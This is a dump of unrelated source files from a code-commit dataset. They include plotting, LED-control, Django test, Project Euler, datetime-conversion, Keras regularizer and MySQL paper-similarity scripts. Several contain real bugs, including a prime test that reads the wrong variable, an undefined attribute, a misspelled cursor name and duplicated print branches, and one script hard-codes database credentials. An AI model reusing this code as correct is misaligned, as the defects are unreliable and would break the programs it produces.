overwrite=True)
features, arrays = persistence.load_features_and_arrays(prefix='example')
normalized = arrays['ip'] - arrays['input']
ind = metaseq.plotutils.tip_zscores(normalized)
fig = metaseq.plotutils.imshow(
normalized,
vmin=5,
vmax=99.,
percentile=True,
sort_by=ind,
imshow_kwargs=dict(interpolation='bilinear'),
line_kwargs=dict(color='k'),
fill_kwargs=dict(color='k', alpha=0.4),
x=np.linspace(-1000, 1000, 100),
height_ratios=(2, 1, 1)
)
fig.array_axes.xaxis.set_visible(False)
fig.array_axes.set_ylabel('Transcripts on chr17')
fig.array_axes.axvline(0, color='k', linestyle='--')
fig.line_axes.set_xlabel('Distance from TSS')
fig.line_axes.axvline(0, color='k', linestyle='--')
from matplotlib import pyplot as plt
import matplotlib
d = metaseq.results_table.ResultsTable(
metaseq.example_filename('GSM847566_SL2592.table'),
import_kwargs=dict(index_col=0))
d = d.reindex_to(features, attribute='transcript_id')
import pandas
labels = pandas.qcut(d.fpkm, 4).labels
ulabels = sorted(list(set(labels)))
colors = matplotlib.cm.YlOrBr((np.array(ulabels) + 2) / 5.)
bottom_axes = plt.subplot(fig.gs[2, 0])
for q, color in zip(ulabels, colors):
ind = labels == q
print q, color
metaseq.plotutils.ci_plot(
np.linspace(-1000, 1000, 100),
normalized[ind, :],
ax=bottom_axes,
line_kwargs=dict(color=color, label=q),
fill_kwargs=dict(color=color, alpha=0.5),
)
fig.line_axes.xaxis.set_visible(False)
bottom_axes.set_xlabel('Distance from TSS')
bottom_axes.legend(loc='best', fontsize=10)
fig.array_axes.set_ylabel('Transcripts')
fig.cax.set_ylabel('Enrichment')
fig.subplots_adjust(left=0.2)
bottom_axes.set_ylabel('Enrichment')
fig.line_axes.set_ylabel('Enrichment')
plt.show()
| mit | Python |
|
c1fc0121b02656de7bc99c587743485b5e45e416 | Create angelbambi.py | majikpig/ubtech | angelbambi.py | angelbambi.py | #the following lines will allow you to use buttons and leds
import btnlib as btn
import ledlib as led
import time
#the led.startup() function cycles through the leds
led.startup()
time.sleep(1)
print("All on and off")
#to turn on all leds, use the led.turn_on_all(2) function:
led.turn_on_all()
time.sleep(2)
#to turn off all:
led.turn_off_all()
time.sleep(1)
print("Red on and off")
#to turn on a single led, use a command like this:
led.turn_on(led.red)
#your choices for leds are led.red, led.yellow, led.green, led.blue
time.sleep(2)
#to turn it off:
led.turn_off(led.red)
time.sleep(1)
print("Yellow with isOn test")
#the led.isOn(led) function tells you if a particular led is currently on
if led.isOn(led.yellow):
print("Yellow is on")
else :
print("Yellow is on")
time.sleep(3)
led.turn_on(led.yellow)
if led.isOn(led.yellow):
print("Yellow is on")
else :
print("Yellow is off")
time.sleep(6)
led.turn_off(led.yellow)
time.sleep(41)
print("Green and blue switch")
#the led.switch(led) function knows whether an led is on or off and switches its value
led.turn_on(led.green)
time.sleep(3)
led.switch(led.green)
led.switch(led.blue)
time.sleep(2.2)
led.switch(led.blue)
time.sleep(1.4)
print("If switch is on, press yellow for yellow and red for red")
#the btn.isOn(btn) function tells you if a particular button is being pressed or if a switch is on
#your choices for buttons are currently btn.red, btn.yellow, btn.switch
while btn.isOn(btn.switch) :
if btn.isOn(btn.yellow):
led.switch(led.purple)
if btn.isOn(btn.red) :
led.switch(led.blue)
time.sleep(0.25) #this line keeps it from querying too fast and mistaking a long press for multiple presses
print("Goodbye")
btn.GPIO.cleanup()
| mit | Python |
|
0135ce760bb3bf8f2fd828fdb195bcdc4e4c3117 | Add sample.py | tkf/traitscli,tkf/traitscli | sample.py | sample.py | from traitscli import TraitsCLIBase
from traits.api import Bool, Float, Int, Str, Enum, Event
class SampleCLI(TraitsCLIBase):
"""Sample CLI using `traitscli`."""
not_configurable_from_cli = Bool
yes = Bool(config=True)
fnum = Float(config=True)
inum = Int(config=True)
string = Str(config=True)
choice = Enum(['a', 'b', 'c'], config=True)
def do_run(self):
names = self.class_trait_names(
# Avoid 'trait_added' and 'trait_modified'
# (See also `HasTraits.traits`):
trait_type=lambda t: not isinstance(t, Event))
width = max(map(len, names))
for na in names:
print "{0:{1}} : {2!r}".format(na, width, getattr(self, na))
if __name__ == '__main__':
SampleCLI.cli()
| bsd-3-clause | Python |
|
1706531082d75f7d6522b4f7d409df8d4fb2b3d7 | Create __init__.py | stiphyMT/plantcv,danforthcenter/plantcv,danforthcenter/plantcv,danforthcenter/plantcv,stiphyMT/plantcv,stiphyMT/plantcv | plantcv/plantcv/visualize/eCDF/__init__.py | plantcv/plantcv/visualize/eCDF/__init__.py | from plantcv.plantcv.visualize.eCDF.obj_size import obj_size
__all__ = ["obj_size"]
| mit | Python |
|
4d4120d6982a02a01b8dd2a4853eab47d7fe6f83 | Create tests.py | blackseabass/django-polls,blackseabass/django-polls | polls/tests.py | polls/tests.py | import datetime
from django.utils import timezone
from django.test import TestCase
from .models import Question
# Create your tests here.
class QuestionMethodTests(TestCase):
def test_was_published_recently_with_future_question(self):
"""
was_published_recently() should return False for questions whose
pub_date is in the future.
"""
time = timezone.now() + datetime.timedelta(days=30)
future_question = Question(pub_date=time)
self.assertEqual(future_question.was_published_recently(), False)
def test_was_published_recently_with_old_question(self):
"""
was_published_recently() should return False for question whose
pub_date is older than 1 day.
"""
time = timezone.now() - datetime.timedelta(days=30)
old_question = Question(pub_date=time)
self.assertEqual(old_question.was_published_recently(), False)
def test_was_published_recently_with_recent_question(self):
"""
was_published_recently() should return True for question whose
pub_date is within the last day.
"""
time = timezone.now() - datetime.timedelta(hours=1)
recent_question = Question(pub_date=time)
self.assertEqual(recent_question.was_published_recently(), True)
| bsd-3-clause | Python |
|
15aa7efa3dfdade3001cdb6b5ac4c2f3c5cc2461 | Test Commit | SharedKnowledge/SharkPython,SharedKnowledge/SharkPython,SharedKnowledge/SharkPython | raspberry/asip/RelationSemanticTag.py | raspberry/asip/RelationSemanticTag.py | from SemanticTag import *
#Test | agpl-3.0 | Python |
|
95c34b9ad7ca6c425853642353a2d56282cc94d1 | add script | hadim/fiji_tools,hadim/fiji_scripts,hadim/fiji_tools,hadim/fiji_scripts,hadim/fiji_scripts | plugins/Scripts/Plugins/Convert_To_8bit.py | plugins/Scripts/Plugins/Convert_To_8bit.py | # @DatasetIOService ds
# @ConvertService convert
# @UIService ui
import os
from ij import IJ
from ij import ImagePlus
d = "/home/hadim/Insync/Data/Microscopy/PSF/2016.04.12.T1/raw"
files = os.listdir(d)
for fname in files:
fpath = os.path.join(d, fname)
print(fpath)
print(fpath)
dataset = ds.open(fpath)
ui.show(dataset)
imp = convert.convert(dataset, ImagePlus)
IJ.run("8-bit")
ds.save(dataset, fpath) # DOES NOT WORK
| bsd-3-clause | Python |
|
8cdbda5c0694f4137c1b8a92bafd7f33a6a84d78 | solve pep_751 | filippovitale/pe,filippovitale/pe,filippovitale/pe,filippovitale/pe | pe-solution/src/main/python/pep_751.py | pe-solution/src/main/python/pep_751.py | from typing import Tuple
from decimal import Decimal, ROUND_FLOOR
def b_a(b: Decimal) -> Tuple[Decimal, Decimal]:
a = b.to_integral_exact(ROUND_FLOOR)
b = a * (b % 1 + 1)
return a, b
def th_tau(th: Decimal, n: int) -> Decimal:
a1, b = b_a(th)
l = []
for _ in range(2, n + 1):
a, b = b_a(b)
l.append(a)
return Decimal(f"{a1}." + "".join(map(str, l)))
def solve():
n_max = 15
tau = 2
for n in range(2, n_max + 1):
k = Decimal(10) ** (-n + 1)
for th in [tau + k * x for x in range(0, 10)]:
if (tau := th_tau(th, n)) < th:
break
return f"{tau:.24f}"
if __name__ == "__main__":
theta = Decimal("2.956938891377988")
tau = Decimal("2.3581321345589")
assert th_tau(theta, 9) == tau
print(solve())
| mit | Python |
|
0428d4889b34568a5b5397532dfd0091029b64de | Create problem-10.py | vnbrs/project-euler | problem-10.py | problem-10.py | import math
def is_prime(next):
if n == 2:
return True
if n == 3:
return True
if n % 2 == 0:
return False
if n % 3 == 0:
return False
i = 5
w = 2
while math.pow(i, 2) <= n:
if n % i == 0:
return False
i += w
w = 6 - w
return True
s = 0
max = 2000000
for n in range(2, max-1):
if is_prime(n):
s += n
print(s)
| mit | Python |
|
4fe4cad49367b462c2201b98cce4382bff3a0206 | Add a script which use the iterative parsing to process the map file and find out not only what tags are there, but also how many, to get the feeling on how much of which data you can expect to have in the map. | aguijarro/DataSciencePython | DataWrangling/CaseStudy/mapparser.py | DataWrangling/CaseStudy/mapparser.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Your task is to use the iterative parsing to process the map file and
find out not only what tags are there, but also how many, to get the
feeling on how much of which data you can expect to have in the map.
Fill out the count_tags function. It should return a dictionary with the
tag name as the key and number of times this tag can be encountered in
the map as value.
Note that your code will be tested with a different data file than the 'example.osm'
"""
import xml.etree.cElementTree as ET
import pprint
import os
def count_tags(filename):
# YOUR CODE HERE
tags = {}
for event, elem in ET.iterparse(filename):
if elem.tag in tags:
tags[elem.tag] += 1
else:
tags[elem.tag] = 1
return tags
def test():
os.chdir('./data')
tags = count_tags('example.osm')
pprint.pprint(tags)
assert tags == {'bounds': 1,
'member': 3,
'nd': 4,
'node': 20,
'osm': 1,
'relation': 1,
'tag': 7,
'way': 1}
if __name__ == "__main__":
test() | mit | Python |
|
3d18f6e3ba3519422aa30bd25f3511f62361d5ca | Add test to ensure no mutable default arguments | wkentaro/chainer,niboshi/chainer,chainer/chainer,niboshi/chainer,wkentaro/chainer,pfnet/chainer,niboshi/chainer,hvy/chainer,wkentaro/chainer,chainer/chainer,okuta/chainer,wkentaro/chainer,okuta/chainer,okuta/chainer,chainer/chainer,chainer/chainer,hvy/chainer,niboshi/chainer,hvy/chainer,okuta/chainer,hvy/chainer | tests/chainer_tests/test_chainer_objects.py | tests/chainer_tests/test_chainer_objects.py | import importlib
import inspect
import pkgutil
import types
import six
import unittest
import chainer
from chainer import testing
def walk_modules():
root = chainer.__path__
for loader, modname, ispkg in pkgutil.walk_packages(root, 'chainer.'):
# Skip modules generated by protobuf.
if '_pb2' in modname:
continue
try:
mod = importlib.import_module(modname)
except ImportError:
continue
yield mod
def get_classes(module):
# Enumerate classes from a module
for name, o in module.__dict__.items():
if (inspect.isclass(o)
and o.__module__.startswith('chainer.')):
yield o
def get_functions(module):
# Enumerate functions from a module
# Normal functions
for k, o in module.__dict__.items():
if (isinstance(o, types.FunctionType)
and o.__module__.startswith('chainer.')):
yield o
# Methods defined in a class
for cls in get_classes(module):
if cls.__module__.startswith('chainer.'):
for k, o in cls.__dict__.items():
if inspect.isfunction(o):
yield o
def get_default_arguments(func):
# Retrieves the defaults arguments (names and values) of a function.
if six.PY2:
# Python 2
spec = inspect.getargspec(func)
if spec.defaults is not None:
n = len(spec.defaults)
for name, default_value in zip(spec.args[-n:], spec.defaults):
yield name, default_value
else:
# Python 3
signature = inspect.signature(func)
for name, param in signature.parameters.items():
if param.default is not inspect.Parameter.empty:
yield name, param.default
class TestFunctions(unittest.TestCase):
def test_no_mutable_default_args(self):
type_blacklist = (list, dict)
badlist = []
# Collect mutable default arguments
for mod in walk_modules():
for func in get_functions(mod):
for arg_name, value in get_default_arguments(func):
if isinstance(value, type_blacklist):
badlist.append((func, arg_name, type(value)))
if len(badlist) > 0:
# Report the error
s = six.StringIO()
s.write(
'Some functions have mutable values as default values:\n\n')
for func, arg_name, value_type in badlist:
s.write('{}.{}: arg=\'{}\' type={}\n'.format(
func.__module__, func.__name__, arg_name, value_type))
assert False, s.getvalue()
testing.run_module(__name__, __file__)
| mit | Python |
|
fcb07c7cd94f96cd533c55d18a657673f9eeac7f | Move log related functions over to this file | NekoGamiYuki/SpicyTwitch | SpicyTwitch/Log_tools.py | SpicyTwitch/Log_tools.py | # Imports-----------------------------------------------------------------------
import logging
import os
from inspect import stack, getmodulename
from . import Storage
# Base setup--------------------------------------------------------------------
log_to_stdout = True
log_to_file = True
logging_level = logging.DEBUG # TODO: Change this back to INFO!
log_format = '[%(asctime)s] [%(levelname)s] [%(module)s] (%(funcName)s): ' \
'%(message)s'
date_format = '%Y/%m/%d %I:%M:%S %p'
log_formatter = logging.Formatter(log_format, datefmt=date_format)
console_handler = logging.StreamHandler()
console_handler.setFormatter(log_formatter)
log_storage = os.path.join(Storage.primary_storage_directory, 'logs')
if not os.path.exists(log_storage):
os.mkdir(log_storage)
# Functions---------------------------------------------------------------------
def get_module_name() -> str:
return getmodulename(stack()[2][1])
def create_logger() -> logging.Logger:
python_module = get_module_name()
module_logger = logging.getLogger(python_module)
if log_to_stdout:
module_logger.addHandler(console_handler)
if log_to_file:
file_path = os.path.join(log_storage, python_module + '.log')
file_handler = logging.FileHandler(file_path)
file_handler.setFormatter(log_formatter)
module_logger.addHandler(file_handler)
module_logger.setLevel(logging_level)
return module_logger
| mit | Python |
|
7ec36d0a1d0a757d0c914e4857ae06f4fece88f8 | Add HexTerrain | jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools,jhanley634/testing-tools | problem/pop_map/hexagon/hex_terrain.py | problem/pop_map/hexagon/hex_terrain.py | #! /usr/bin/env python
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
"""Implements a "flat" hex grid, using invaluable advice from Amit Patel
https://www.redblobgames.com/grids/hexagons
"""
# We choose flat-top rather than pointy-top hexes,
# with odd-q vertical layout. # , and doubleheight.
# We adopt Amit's "origin at upper left" convention,
# which implies that angles resemble compass angles,
# with small positive angles in quadrant IV rather than I.
from enum import Enum, auto
import numpy as np
class Direction(Enum):
# (col, row) deltas
SE = (1, 0)
SOUTH = (0, 1)
SW = (-1, 0)
NW = (-1, -1)
NORTH = (0, -1)
NE = (1, -1)
class CellContent(Enum):
# breadcrumbs for a traversed path:
MARKED_SE = auto()
MARKED_SOUTH = auto()
MARKED_SW = auto()
MARKED_NW = auto()
MARKED_NORTH = auto()
MARKED_NE = auto()
UNMARKED = auto() # like Path in a maze
CITY = auto() # a goal cell
MOUNTAIN = auto() # impassable, like Wall in a maz
class HexTerrain:
''
if __name__ == '__main__':
HexTerrain()
| mit | Python |
|
4061e5db7097a680405282e371ab3bf07758648a | Add simple unit tests to validate all configs | facebookresearch/detectron2,facebookresearch/detectron2,facebookresearch/detectron2 | projects/DensePose/tests/test_setup.py | projects/DensePose/tests/test_setup.py | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import os
import unittest
from detectron2.config import get_cfg
from detectron2.engine import default_setup
from densepose import add_densepose_config
_CONFIG_DIR = "configs"
_QUICK_SCHEDULES_CONFIG_SUB_DIR = "quick_schedules"
_CONFIG_FILE_PREFIX = "densepose_"
_CONFIG_FILE_EXT = ".yaml"
def _get_config_dir():
return os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", _CONFIG_DIR)
def _collect_config_files(config_dir):
paths = []
for entry in os.listdir(config_dir):
_, ext = os.path.splitext(entry)
if ext != _CONFIG_FILE_EXT:
continue
if not entry.startswith(_CONFIG_FILE_PREFIX):
continue
path = os.path.join(config_dir, entry)
paths.append(path)
return paths
def _get_config_files():
config_dir = _get_config_dir()
return _collect_config_files(config_dir)
def _get_quick_schedules_config_files():
config_dir = _get_config_dir()
config_dir = os.path.join(config_dir, _QUICK_SCHEDULES_CONFIG_SUB_DIR)
return _collect_config_files(config_dir)
class TestSetup(unittest.TestCase):
def _test_setup(self, config_file):
cfg = get_cfg()
add_densepose_config(cfg)
cfg.merge_from_file(config_file)
cfg.freeze()
default_setup(cfg, {})
def test_setup_configs(self):
config_files = _get_config_files()
for config_file in config_files:
self._test_setup(config_file)
def test_setup_quick_schedules_configs(self):
config_files = _get_quick_schedules_config_files()
for config_file in config_files:
self._test_setup(config_file)
| apache-2.0 | Python |
|
d1bc6c3fd5741c5c8d3d6dd2ee5c5c28c2764ba3 | add Tumblr.py | xiahei/Daily_scripts,x1ah/Daily_scripts,xiahei/Daily_scripts,x1ah/Daily_scripts,x1ah/Daily_scripts,x1ah/Daily_scripts,xiahei/Daily_scripts,x1ah/Daily_scripts | TumblrResource/Tumblr.py | TumblrResource/Tumblr.py | #!/usr/bin/env python
# coding:utf-8
| mit | Python |
|
a0d196af4d3854365bedb581d25d73af3271cb1a | add python script file | hadacchi/mydatetime | mydatetime.py | mydatetime.py | #!/usr/bin/python
from datetime import datetime,timedelta
import numpy
# -----------------------------------------------------------------
# mydatetime v0.2 for python
# Copyright (c) 2007 t.hada
# -----------------------------------------------------------------
###
# This script is convert from/into date into/from serial date
# Excels count 1900/2/29 (ref. Microsoft Help & Support No. 214019),
# but python don't count. Thus, return value from this script
# `toSerial()' is equals only after 1900/3/1
#
# if you need valid serial date, change base date `__ZERODATE'
# from (datetime.datetime(1970,1,1),25569)
# to (datetime.datetime(1900,1,1),1)
class mydatetime(datetime):
# base date
# to identify Excels
__ZERODATE=(datetime(1970,1,1,0,0,0,0),25569)
# to return valid serial date
#__ZERODATE=(datetime(1900,1,1,0,0,0,0),1)
# expressmilliseconds
__MILLIFMT='%u'
# constructor
def __init__(self,year,month,day,\
hour=0,minute=0,second=0,microsecond=0,tzinfo=0):
try:
# call parent's constructor
datetime.__init__(year,month,day,hour,\
minute,second,microsecond,tzinfo)
except: raise
def __sub__(self,t):
# if return value is <type 'timedelta'>
if t.__class__ == self.__class__ or \
t.__class__ == self.__ZERODATE[0].__class__:
return datetime.__sub__(self,t)
# else (mydatetime-timedelta) should be mydatetime
else:
tmp=datetime.__sub__(self,t)
return mydatetime(tmp.year,tmp.month,tmp.day,tmp.hour,\
tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def __add__(self,t):
# if return value is <type 'timedelta'>
if t.__class__ == self.__class__ or \
t.__class__ == self.__ZERODATE[0].__class__:
return datetime.__add__(self,t)
# else (mydatetime-timedelta) should be mydatetime
else:
tmp=datetime.__add__(self,t)
return mydatetime(tmp.year,tmp.month,tmp.day,tmp.hour,\
tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def strftime(self,fmt):
tmp=[]
for i in fmt.split('%%'):
tmp.append(('%06d'%self.microsecond)[:3]\
.join(i.split(self.__MILLIFMT)))
return datetime.strftime(self,'%%'.join(tmp))
# return serial date
def toSerial(self):
tmp=self-self.__ZERODATE[0]
serial_val=self.__ZERODATE[1]+tmp.days
serial_val=serial_val+float(tmp.seconds)/24/3600\
+float(tmp.microseconds)/24/3600/1000000
return serial_val
def fromTuple(d,t=(0,0,0)):
"""d=(year,month,day),t=(hour,min,sec),sec can be float
"""
try:
if type(t[2]) is float: f=int(t[2]*1000000-int(t[2])*1000000)
elif len(t)>=4: f=t[3]
else: f=0
# call parent's constructor
return mydatetime(d[0],d[1],d[2],t[0],t[1],int(t[2]),f)
except: raise
# return mydatetime from serial value
def fromSerial(val):
tmp=val-mydatetime._mydatetime__ZERODATE[1]
day=int(tmp)
sec=round((tmp-day)*24*3600,3)
dt=timedelta(days=day,seconds=sec)
tmp=mydatetime._mydatetime__ZERODATE[0]+dt
return mydatetime(tmp.year,tmp.month,tmp.day,\
tmp.hour,tmp.minute,tmp.second,tmp.microsecond,tmp.tzinfo)
def Serial2Sec(val,comp=False):
"""if comp is True, return complete seconds(LongInt) from ZERODATE
"""
if type(val)!=numpy.ndarray:
if type(val)!=type([]): numpy.array([val])
else: numpy.array(val)
else: True
c=24*3600
if not comp: return numpy.round((val-numpy.array(val,dtype=int))*c,3)
else:
val=val-mydatetime._mydatetime__ZERODATE[1]
return numpy.round((val-numpy.array(val,dtype=int))*c+numpy.array(val,dtype=int)*c,3)
if len(ret)==1: return ret[0]
else: return ret
| bsd-3-clause | Python |
|
3129819c7d2ff3b35dd0270c0a27ef694a7e4d9e | Add regularizers.py | EderSantana/seya | seya/regularizers.py | seya/regularizers.py | from keras.regularizers import Regularizer
class GaussianKL(Regularizer):
def set_param(self, p):
self.p = p
def set_layer(self, layer):
self.layer = layer
def __call__(self, loss):
# See Variational Auto-Encoding Bayes by Kingma and Welling.
mean, sigma = self.layer.get_output(True)
kl = -.5 - self.logsigma + .5 * (mean**2
+ T.exp(2 * self.logsigma))
loss += kl.mean()
return loss
def get_config(self):
return {"name": self.__class__.__name__}
class SimpleCost(Regularizer):
def set_param(self, cost):
self.cost = cost
def __call__(self, loss):
loss += self.cost
return loss
def get_config(self):
return {"name": self.__class__.__name__}
| bsd-3-clause | Python |
|
e0eb68fa33dc6dea9f1b4a0f6cb1161e4128cfd7 | add paper sim by summary | gchen/recop | recommendation/paper_sim_by_summary.py | recommendation/paper_sim_by_summary.py | import MySQLdb
import sys
sys.path.append("../../include/python/")
from paper import Paper
import math
from operator import itemgetter
def getWordFreq():
connection1 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor1 = connection1.cursor()
cursor1.execute("select id, titile, abstract from paper where length(abstract) > 50")
ret = dict()
numrows = int(cursor1.rowcount)
for k in range(numrows):
if k % 10000 == 0:
print k
row = cursor1.fetchone()
paper_id = row[0]
entities = dict()
words = (row[1] + " " + row[2].lower()).split()
for word in words:
if word not in ret:
ret[word] = 1
else:
ret[word] = ret[word] + 1
cursor1.close()
connection1.close()
return ret
def generatePaperEntities():
word_freq = getWordFreq()
connection1 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor1 = connection1.cursor()
connection2 = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor2 = connection2.cursor()
cursor2.execute("truncate table tmp_paper_entities;")
cursor1.execute("select id, titile, abstract from paper where length(abstract) > 50")
entity_dict = dict()
numrows = int(cursor1.rowcount)
for k in range(numrows):
if k % 10000 == 0:
print k
row = cursor1.fetchone()
paper_id = row[0]
entities = dict()
words = (row[1] + " " + row[2].lower()).split()
for word in words:
if word not in word_freq:
continue
if word_freq[word] > 200:
continue
if word not in entities:
entities[word] = 1
else:
entities[word] = entities[word] + 1
for (entity,weight) in entities.items():
entity_id = len(entity_dict)
if entity in entity_dict:
entity_id = entity_dict[entity]
else:
entity_dict[entity] = entity_id
cursor2.execute("replace into tmp_paper_entities (paper_id, entity_id, weight) values (%s, %s, %s)", (paper_id, entity_id, weight))
cursor1.close()
connection1.close()
cursor2.close()
connection2.close()
def paperSim():
connection = MySQLdb.connect(host = "127.0.0.1", user = "recop", passwd = "recop", db = "recop")
cursor = connection.cursor()
cursor.execute("truncate table papersim_summary;")
for mod in range(20):
simTable = dict()
cursor.execute("select paper_id, entity_id from tmp_paper_entities order by entity_id;")
numrows = int(cursor.rowcount)
print numrows
prev_entity = -1
papers = []
for k in range(numrows):
if k % 100000 == 0:
print k
row = cursor.fetchone()
entity_id = row[1]
paper_id = row[0]
if prev_entity != entity_id:
if len(papers) < 200:
for i in papers:
if i % 20 != mod:
continue
if i not in simTable:
simTable[i] = dict()
for j in papers:
if i == j:
continue
if j not in simTable[i]:
simTable[i][j] = 0
weight = 1 / math.log(2 + len(papers))
simTable[i][j] = simTable[i][j] + weight
prev_entity = entity_id
papers = []
papers.append(paper_id)
print len(simTable)
n = 0
for i, rels in simTable.items():
n = n + 1
if n % 10000 == 0:
print n
k = 0
for j, weight in sorted(rels.items(), key = itemgetter(1), reverse = True):
cursor.execute("replace into papersim_summary(src_id, dst_id, weight) values (%s, %s, %s);", (i, j, weight))
k = k + 1
if k > 10:
break
connection.commit()
curosr.close()
connection.close()
#generatePaperEntities()
paperSim()
| apache-2.0 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.